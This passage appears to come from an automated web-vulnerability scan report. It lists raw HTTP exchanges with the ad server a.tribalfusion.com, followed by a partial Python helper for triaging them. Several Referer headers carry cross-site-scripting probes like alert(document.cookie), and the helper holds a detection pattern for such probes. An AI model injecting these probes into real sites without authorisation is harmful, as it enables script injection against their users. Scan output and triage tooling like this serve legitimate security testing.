27.9. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.10. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.11. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/

Request

GET /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.12. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/

Request

GET /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.13. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Request

GET /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 346

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15b
...[SNIP]...

27.14. http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html

Request

GET /p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 389

<IFRAME src="http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff
...[SNIP]...

27.15. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/js/thickbox.jsd2772'%3balert(1)//244e853bb28
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

27.16. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.17. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/

Request

GET /p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.18. http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html

Request

GET /p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 390

<IFRAME src="http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvT
...[SNIP]...
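
Items such as 27.8, 27.14, 27.15 and 27.18 above are raw exchanges in which a third-party ad host (a.tribalfusion.com, ad.doubleclick.net) receives a Referer from another site, and several of those Referers still carry the crawler's own alert(1) / alert(document.cookie) probe strings. The following triage helper is an added example written for this page; it is not code from the CloudScan crawler. It parses one item in the "Request" / "Response" layout used throughout the report, compares the Referer host with the request Host (both exact-host and a crude same-site check), flags probe-like strings in the Referer after percent-decoding, and records the response status and whether the response was marked no-store. The two embedded inputs are trimmed copies of items 27.18 and 27.10 (cookie values and the long p.media path shortened); the function names (`triage`, `site_of`, `parse_http_message`) and the probe patterns in `PROBE_RE` are the editor's assumptions about what a reviewer wants flagged, not the scanner's classification.

```python
"""Triage helper for the raw HTTP request/response pairs printed in this report.

Added example for this page, not code from the CloudScan crawler.  The checks are
the editor's assumptions: cross-host / cross-site Referer, script-injection probe
in the Referer, response status, and a no-store cache directive on the response.
"""
import re
from urllib.parse import unquote, urlsplit

# Strings that mark an injected-script probe rather than a normal URL.
# Assumption: the editor's patterns, tuned to the probes visible in this report.
PROBE_RE = re.compile(r"alert\s*\(|<script|javascript:", re.IGNORECASE)


def parse_http_message(raw):
    """Split one HTTP message into (start line, headers dict, body).

    Header names are lower-cased; a repeated header keeps its last value.
    Accepts the report's LF-only dumps as well as CRLF wire format."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def split_report_item(item):
    """Return (request_text, response_text) from the report's
    'Request' / 'Response' layout used for every numbered item."""
    _, _, rest = item.partition("Request\n\n")
    request, _, response = rest.partition("\n\nResponse\n\n")
    return request, response


def site_of(host):
    """Crude registrable-domain guess: the last two labels.  Adequate for the
    .com hosts in this report; wrong for public suffixes such as co.uk."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage(item):
    """Summarise one report item as a dict a reviewer can sort and filter on."""
    request, response = split_report_item(item)
    req_line, req_h, _ = parse_http_message(request)
    status_line, resp_h, _ = parse_http_message(response)

    host = req_h.get("host", "").lower()
    referer = req_h.get("referer", "")
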